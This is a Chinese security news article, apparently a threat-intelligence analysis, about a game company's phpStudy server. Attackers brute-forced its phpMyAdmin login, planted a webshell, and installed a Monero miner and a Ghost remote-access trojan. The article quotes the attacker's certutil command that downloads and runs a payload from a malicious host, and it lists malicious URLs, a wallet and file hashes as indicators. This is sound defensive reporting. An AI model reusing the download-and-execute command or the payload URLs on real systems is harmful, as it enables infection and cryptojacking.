freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    北京某手游公司官网配置不当被黑,官服惨变矿机,玩家信息或泄露
    2018-07-25 16:34:08
    所属地 广东省

    一、概述

    近日,腾讯御见威胁情报中心感知到北京某互娱公司所属手游官网服务器被黑,并且被植入了挖矿木马。

    1.png

    2.png

    技术分析发现,入侵者通过官网phpMyadmin后台管理登录页面爆破登录,再下载挖矿木马挖门罗币,管理员对服务器的不正确配置成为黑客入侵的最佳通道。

    攻击者在该服务器挖矿之后,还使用Ghost远程控制木马的变种完全控制了该服务器,致使该服务器的所有信息都可被攻击者掌握,该游戏官网的不当配置可能导致玩家个人信息泄露。

    腾讯安全专家提醒phpStudy搭建网站的用户加固服务器,移除不正确的配置,避免服务器成为黑客控制的肉鸡。

    二、入侵分析

    对入侵的机器进行分析,发现黑客通过工具对其官网服务器phpMyadmin后台管理登录页面进行弱口令猜解,猜解成功后,并写入webshell,通过getshell执行下载挖矿木马进行挖矿。

    通过受害者服务器暴露在外的信息发现,受害者服务器使用phpStudy搭建。

    3.png

    (phpStudy探针)

    phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等,总之学习PHP只需一个包。

    通过访问phpStudy探针可以看到服务器详细信息。并且该页面可尝试进行mysql登录。

    4.png

    (Mysql登录)

    黑客入侵后写入webshell,通过getshell执行以下命令:

    cmd.exe /c "certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe"

    三、样本分析

    1. 母体Wkinstall.exe分析

    Wkinstall.exe是一个自解压文件:

    5.png

    首先会运行start.bat,然后start.bat会创建任务并执行down.bat和open.bat。

    6.png

    down.bat负责下载远程控制木马hh.exe和挖矿组件wrsngm.zip,并运行qc.bat,

    qc.bat负责清除上传的cmd.php和Wkinstall.exe。

    7.png

    open.bat负责运行矿机:

    8.png

    2. 远控hh.exe分析

    hh.exe首先会解密内置字符串,解密出来的为图片,下载地址为:

    http://down.ctosus.ru/ctos002.jpg

    下载下来的图片是一个加密的文件,hh.exe会解密图片。

    解密后发现为经过UPX加壳的dll,随后会进行UPX的解压缩,解压缩后去除PE头部信息并写入到未解压缩之前DLL的内存中,定位执行点传入参数执行。

    9.png

    分析发现该DLL为Ghost变种远程控制木马。

    10.png

    3. wrsngm.zip矿机分析

    wrsngm.zip为一个压缩包,里面包含了门罗币的挖矿程序和相关的配置文件:

    11.png

    12.png

    13.png

    矿池:wk.ctosus.ru:9999

    钱包:

    4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7

    四、攻击者分析

    根据作者在配置文件中留下的一些线索,我们进行分析:

    14.png

    在该服务器进行分析,发现服务器上存放着大量的黑客工具。

    15.png

    并且发现了此次使用的phpMyadmin爆破工具和webshell。

    16.png

    (黑客工具包)

    同时在其服务器主页上发现其个人社交信息,与挖矿配置文件中的社交信息吻合,确定下载服务器为其个人所有。

    17.png

    18.png

    对此人社交帐号继续进行分析,发现其云盘中也存放着多个黑客利用工具,还有16年在渗透吧就交流过phpMyadmin入侵提权方法。

    19.png

    20.png

    五、解决方案

    1. 加固服务器,修补服务器安全漏洞。及时修改mysql密码,移除探针,移除phpmyadmin。

    2. 使用腾讯御知网络空间风险雷达(网址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控。

    3. 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。

    六、附录:IOCs

    URL:

    http://down.ctosus.ru/hh.exe

    http://down.ctosus.ru/wrsngm.zip

    http://down.ctosus.ru

    https://blog.ctoscn.ru

    http://down.ctosus.ru/wkinstall.exe

    http://down.ctosus.ru/ctos002.jpg

    MD5:

    1415809a5ada011987abe56914dcfb9e

    226c5e3a2b22297668fd35882b378fcd

    d27202ad0a80edefc2067a7d905f2044

    # 服务器安全 # 挖矿木马
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者